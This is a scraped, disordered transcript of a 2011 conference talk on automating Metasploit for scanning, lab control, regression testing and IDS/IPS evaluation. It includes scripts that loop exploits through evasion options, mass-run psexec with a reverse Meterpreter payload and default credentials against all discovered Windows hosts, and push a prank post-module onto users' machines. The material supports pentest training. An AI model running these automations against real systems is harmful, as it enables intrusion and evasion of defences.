Loading presentation...
Prezi is an interactive zooming presentation

Present Remotely

Send the link below via email or IM


Present to your audience

Start remote presentation

  • Invited audience members will follow you as you navigate and present
  • People invited to a presentation do not need a Prezi account
  • This link expires 10 minutes after you close the presentation
  • A maximum of 30 users can follow your presentation
  • Learn more about this feature in our knowledge base article

Do you really want to delete this prezi?

Neither you, nor the coeditors you shared it with will be able to recover it again.


Make your likes visible on Facebook?

Connect your Facebook account to Prezi and let your likes appear on your timeline.
You can change this under Settings & Account at any time.

No, thanks

Source Barcelona 2011 - Metasploit: The Hacker's Other Swiss Army Knife

Final - 11/17/2011

Joshua Smith

on 30 August 2012

Comments (0)

Please log in to add your comment.

Report abuse

Transcript of Source Barcelona 2011 - Metasploit: The Hacker's Other Swiss Army Knife

and Simulating
Attackers ^^^ The Hacker's Other
Swiss Army Knife Who are we? I'm not sure, I met him @defcon

Jonathan Cran (jcran), Director of QA @ Rapid7
Joshua Smith (kernelsmith), Security Engineer @ JHUAPL How do I get there from here? Post
Resource Files
Core Tend to accomplish a specific task
Auxiliary modules do things like scanning, brute forcing etc, usually pre-exploitation
Exploit modules create a session
Post-exploitation module, something you do after exploitation, operate on a session
Modules tend to have a particular focus; do "one" thing and do it well
Modules are usually the OBJECT of automation (commonly called from resource scripts)
Well-defined structure Extend the functionality of the framework
Often add new commands to to the console
Examples: lab, editor, db_fun, nessus
Not loaded on intitial framework startup, must be 'load'ed
Can subscribe to events like session open/close Core functionality
Enables entire families of functionality
Often 'require'd
Many extend Ruby itself (Rex)
Most protocols Included into modules
Provide additional methods for multiple modules
Add datastore options and methods that modules can call
Like all ruby mixins, are meant to augment classes
Don't start here, but good place to DRY up code; espcially if it can be utilized by other code Modules Resource Files Plugins MSF
Mixins Drive the console and more powerful than msfcli
Good for automating simple tasks
You can use raw ruby
Generic patterns can be defined w/erb
Traditionally used for pre-defined tasks Core
Libraries Creating and automating
a test lab Testing & Training
Meatware Scheduled / Ongoing Discovery & Enumeration Host
Anomaly Detection Network
Testing IRC C&C
Metasploit Book
Egypt's Framework Training
Sans 580: Metasplot Kung Fu Nation
States Insiders Hack-tavists Script
Kiddies you = Hacker.new
msf = Hacker::Tool.new
msf.desc = "Swiss Army Knife"
you.add_tool(msf) Further Reading Metasploit Team & Community
Marcus Carey
Will Vandevanter
David Thompson
Cinch.rb guys
Daniel Clemens
Lots of Others You do have to get
into the framework But not this far Your company gets pwnd
IT Boss "find all the windows boxes! I need to know if we have any rogue boxes that might not have proper defenses"
Needs to be in clean CSV output
IT will compare list to known good root@bt~# nmap -O --script=smb-os-discovery.nse \ -oA all_win Host is up (0.00044s latency).
135/tcp open msrpc

Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
|_ System time: 2011-11-09 22:36:45 UTC+2 Excellent! (If it doesn't hang) # ok, now cut or awk or... wait, which is it?
# XP or 2003?
# ok, well if I do a for loop:
root@bt~# for ip in $(cat my_ip_list); do
echo -en "$ip,$(nmap...$ip | grep -i windows)\n"
done,Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
| OS: Windows XP (Windows 2000 LAN Manager)
# ugh. hping3 -c 1 --faster -n $IP
parse out ttl
if ~ 128, prolly Windows

Very fast: class B in 10 mins
Very inaccurate: NATs, firewalls root@bt~# !! | grep -i windows
| OS: Windows XP (Windows 2000 LAN Manager) Wait, what? Lost the IP...
Oh well, -oA all_win for the win Use Metasploit you say? msf > db_nmap -O
<fast forward an hour or so>
msf > hosts
address mac name os_name os_flavor os_sp
------- --- ---- ------- --------- ----- <snip> vic Microsoft Windows XP
msf > hosts -o all_win.csv

msf > cat all_win.csv
"","<snip>","vic","Microsoft Windows","XP",""
msf > # USEFUL

msf > db_nmap -O --script=smb-os-discovery
# results are the same

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS
msf auxiliary(smb_version) > set THREADS 256
# check out advanced settings (show advanced)
# e.g. ConnectTimeout, DCERPC::ReadTimeout, SMB::ChunkSize, etc
msf auxiliary(smb_version) > run

msf auxiliary(smb_version) > hosts

address mac name os_name os_flavor os_sp
------- --- ---- ------- --------- ----- Microsoft Windows XP SP0

msf > hosts -c address,os_name,os_flavor,os_sp -o all_win.csv is running Unix Samba 3.4.7 ...

grep -i 'windows\|os_flavor' all_win.csv > only_win.csv Even Better msf auxiliary(smb_version) > run
msf > load db_fun

msf > db_search hosts where os_name~windows
msf > db_set_create only_windows
msf > db_set_show -o only_win.csv

# or even just
msf > db_search -o only_win.csv hosts where os_name~windows Situation: Keeping it quick and dirty... ... and weak Ummm, Nmap. Resource it!

root@bt~# msfconsole -r find_and_report_windows
root@bt~# cat scripts/resource/find_and_report_windows Could Use:
Resource files
db notes Situation:
You don't want your company to buy shiny product Z because you think it's easily defeated and you want to demo
You're an admin, and you want to make sure that you're running continuous security audits on your infrastructure. You have a social life, so you'd like to be alerted about security flaws. Situation:
You're a network administrator and you want to ensure no default passwords are used on your network.

In other words, we need to check systems for a known set of usernames and passwords Situation: You're working as a pentester and you want to be able to control tools from a central console. You're super-l33+, so you hook them up to IRC. Situation:
You're working in internal security, and you want to generate noticeable security events.
You have two competing devices and you want to run them through their paces. Situation: module Msf

class Plugin::Sample < Msf::Plugin
class ConsoleCommandDispatcher
include Msf::Ui::Console::CommandDispatcher

def name "Sample" end

def commands
{ "sample" => "A sample command added by the sample plugin" }

def cmd_sample(*args)
print_line "you ran the sample command"

def initialize(framework, opts)

def cleanup

def name "sample" end

def desc "Demonstrates using framework plugins" end


https://github.com/rapid7/metasploit-framework/blob/master/plugins/sample.rb Just Extend It https://github.com/rapid7/metasploit-framework/tree/master/plugins Other use cases:
- Testing while developing modules
- Regression testing of modules
- Botnet creation & manipulation
- QA Automation Situation:
You're asked to run a pentesting training, and have a bunch of vulnerable targets that you want to control remotely. 1

root@bt~# grep -i windows all_win.gnmap
Host: (vic) Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-term-serv/// Ignored State: closed (996) OS: Microsoft Windows XP Professional SP2 or Windows Server 2003 ... root@bt~#..nmap...$ip| grep -i windows| grep OS:)\n",| OS: Windows XP (Windows 2000 LAN Manager)
# finally, ok, let's clean it up, wait,
# what happened to the Service Pack? Ugh.

# This is too much work, could use some sed action... or use scanner/smb/smb_version
set THREADS 256
load db_fun
db_search hosts where os_name~windows
db_set_create only_windows
db_set_show -o only_win.csv

db_autopwn db_export db_fun_tag db_set_add_to db_set_list
db_connect db_fun_debug db_import db_set_auto db_set_run_module
db_disconnect db_fun_note db_nmap db_set_create db_set_show
db_driver db_fun_show_examples db_search db_set_del_from db_status

db_autopwn db_disconnect db_export db_nmap
db_connect db_driver db_import db_status Architecture: VmController Vm Vm Vm RemoteEsxiDriver WorkstationDriver VirtualBoxDriver start_vm
... .each
.add_from_running .start_vm
.open_uri modifiers allow you to do neat things:
Add a .nmap command to the Vm object
Add a .syn_flood command
Open a session on all vms Configuration: - vmid: backtrack
driver: workstation
location: /home/jcran/secure/vm/backtrack5/Backtrack5x64.vmx
os: linux
flavor: ubuntu
arch: 64
- Linux
- Backtrack
- weak_password
- Meterpreter
- vmid: win2008
driver: workstation
location: /home/jcran/secure/vm/MOD_0x2/MOD_0x2.vmwarevm/MOD_0x2.vmx
credentials: Interfaces msf exploit(handler) > load lab
[*] Successfully loaded plugin: lab
msf exploit(handler) > lab_load /home/jcran/framework/data/lab/sb_lab.yml
msf exploit(handler) > lab_show
Available Lab VMs

Hostname Driver Type
-------- ------ ----
backtrack Lab::Drivers::WorkstationDriver
metasploitable Lab::Drivers::WorkstationDriver
win2008 Lab::Drivers::WorkstationDriver

msf exploit(handler) > lab_
lab_browse_to lab_help lab_load_config lab_load_running lab_revert lab_save lab_search_tags lab_show_running lab_start lab_suspend
lab_clear lab_load lab_load_dir lab_reset lab_run_command lab_search lab_show lab_snapshot lab_stop
msf exploit(handler) > lab_ Demo Demo Demo Metacuke ~/framework/external/metacuke/simple_network:master$ rake cucumber
/home/jcran/.rvm/rubies/ruby-1.9.1-p378/bin/ruby -I "/home/jcran/.rvm/gems/ruby-1.9.1-p378/gems/cucumber-1.1.0/lib:lib" "/home/jcran/.rvm/gems/ruby-1.9.1-p378/gems/cucumber-1.1.0/bin/cucumber" --format pretty
Feature: Check Default Logins
In order to prevent a default login in production
As an administrator
I want to check systems for default logins

Scenario: Check default logins # features/default_login.feature:6
Given I have a list of systems # features/step_definitions/default_login_steps.rb:25
And I have a list of default usernames # features/step_definitions/default_login_steps.rb:17
And I have a list of default passwords # features/step_definitions/default_login_steps.rb:21
When I check for valid logins # features/step_definitions/default_login_steps.rb:29
Then I should not have valid logins # features/step_definitions/default_login_steps.rb:33

Feature: Test
In order to test Metacuke
I want to run a test

Scenario: Test Scenario # features/test.feature:5
Given it's running # features/step_definitions/test_steps.rb:1
And I run a passing test # features/step_definitions/test_steps.rb:4
Then the test should be successful # features/step_definitions/test_steps.rb:12

2 scenarios (2 passed)
8 steps (8 passed)
1m47.347s Cucumber Automated / Regression Testing Tool
Heavily used in the Ruby / Rails Community
Write English descriptions of your expectations
Write Ruby for each step of your description
Run & watch it pass|fail
Typically associated with BDD and QA
Can output XML (and integrates well w/ QA tools)
What if we applied this to security testing Introducing (poc) ~/framework/external/metacuke:master$ find .
./simple_network/Rakefile Feature: Check Default Logins
In order to prevent a default login in production
As an administrator
I want to check systems for default logins

Scenario: Check default logins
Given I have a list of systems
And a list of default users
And a list of default passwords
When I check for valid logins
Then I should not have a valid login


Given /^I have a list of default usernames$/ do
@usernames = "administrator,admin"

Given /^I have a list of default passwords$/ do
@passwords = "test,lab"

Given /^I have a list of systems$/ do
@systems = ""

When /^I check for valid logins$/ do

Then /^I should not have valid logins$/ do
@framework.sessions.count.should == 0
end Feature Definition Step Definitions File Structure LOTS of ways to solve this jenkins_test.rc Canonical Example: IDS/IPS An exercise in toying with evasion # A list of evasion techniques to try
evaders = {
'DCERPC::smb_pipeio' => 'trans', # ['rw'],trans
'DCERPC::fake_bind_multi_append' => 5, # [0], Integer
'SMB::obscure_trans_pipe_level' => 3, # [0], 0-3

# Setup the payload handler

targets.each do |target|
sploits.each do |sploit|

session_count = framework.sessions.count

# 'use' the exploit
run_single("use #{sploit}")

# set RHOST
run_single("set RHOST #{target}")

# for each evasion technique fire off the exploit
evaders.each do |key,value|
run_single("set #{key} #{value}")
run_single("set DisablePayloadHandler true")
run_single("exploit -z")

# Do something if we got a session? If this is IPS, it should prevent sessions?
#junit_error("test,"description") unless framework.sessions.count == session_count

end Send live exploits through an IPS / IDS.
Preferably, you have real targets.
Determine if you can evade.
This is also good for tuning a device.
Ideally, this is entirely automated.
Lots of potential evasion methods. Similar scripts can be constructed for post-exploitation actions to test your meatware.

meatheads.each do |meathead|
run_single("set RHOST #{meathead}")
run_single("use windows/smb/psexec")
run_single("use post/windows/annoy/rick_roll")
run_single("run -j -z")
end Takeaways Automated regression testing for device rules is relatively easy
Iterating over evasion techniques is a good way to figure out how to subvert a device
There's no reason we shouldn't be sharing attack patterns for testing defenders. Takeaways:
XMLRPC is being replaced by msgpack
gem install msfrpc-client
Cinch gem is handy for constructing bots
Every tool should have an IRC interface :) Special Thanks! Offsec Metasploit Unleashed
Big Fat Metasploit Post (Security Aegis)
Metasploit Blog (community.rapid7.com)
Carnal0wnage (carnal0wnage.attackresearch.com)
Shell Is Only The Beginning (darkoperator.com)
Pentestify (pentestify.com) ? ?
? Thanks! We shouldn't re-invent the wheel jenkins Build system framework forked from hudson
Gives us free scheduling & alerting
Can verify test results & xml
Lots of nifty plugins
Easy to setup What is this metasploit thing? Traditional Answer: Exploit Development and Penetration Testing General security testing framework
Regression testing framework
Security control testing framework
Defense training framework
Central control console Also: Let's apply this! Takeaways vm_control plugin Common RC "Spells"

Just call any normal console command
> use exploit/windows/smb/ms08_067_netapi
> load db_fun
Ruby blocks (context = msf console driver)
rhost =
run_single("set RHOST #{rhost}")
# you can load other code too
require 'helpers/demo_methods'
Ask the framework stuff (in a ruby block)
mod = framework.modules.create(modname)
Have parts of your code pre-processed with ERB
exploit -z demo_attacker_T4 db_fun?
A plugin we wrote to increase the database functionality Takes you from this: To this This section was accidentally not presented at SB How does this help me? <ruby>
# Let's require in an "awesome" resource helping file
# Any method starting with rc_ came from this file
resource_dir = File.join(Msf::Config.install_root, "scripts", "resource")
require File.join(resource_dir, "helpers","demo_methods")
$rc_target_network = ""

# load db_fun
load db_fun

# globally jack up the thread count
setg THREADS 256

# delete all hosts, notes, loot from db
hosts -d *
notes -d *
loot -d *

# add hosts
use scanner/smb/smb_version
run_single("set RHOSTS #{$rc_target_network}")

# setup a multi-handler

db_search hosts where os_name~windows
db_set_run_module windows/smb/psexec windows/meterpreter/reverse_tcp \
SMBUser=administrator SMBPass=lab DisablePayloadHandler=true LPORT=4433

# delay a bit to give sessions a chance to setup

db_search sessions where closed_at=nil
db_set_create active_sessions

# run something against all active sessions
db_set_run_module active_sessions post/windows/gather/forensics/reg_check \
REG_VAL=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BadIndicator \

# output the results
db_search -o host_malware_detect_output.csv vulns where name~reg_check Suppose IT boss now wants you to
check each windows box for some
malware artifact, like registry changes

Let's update that resource file, and add
in some other sexiness Demo/Movie Blog: http://blog.pentestify.com/dbfunner code: https://github.com/jcran/metasploit-framework/blob/master/plugins/db_fun.rb
Full transcript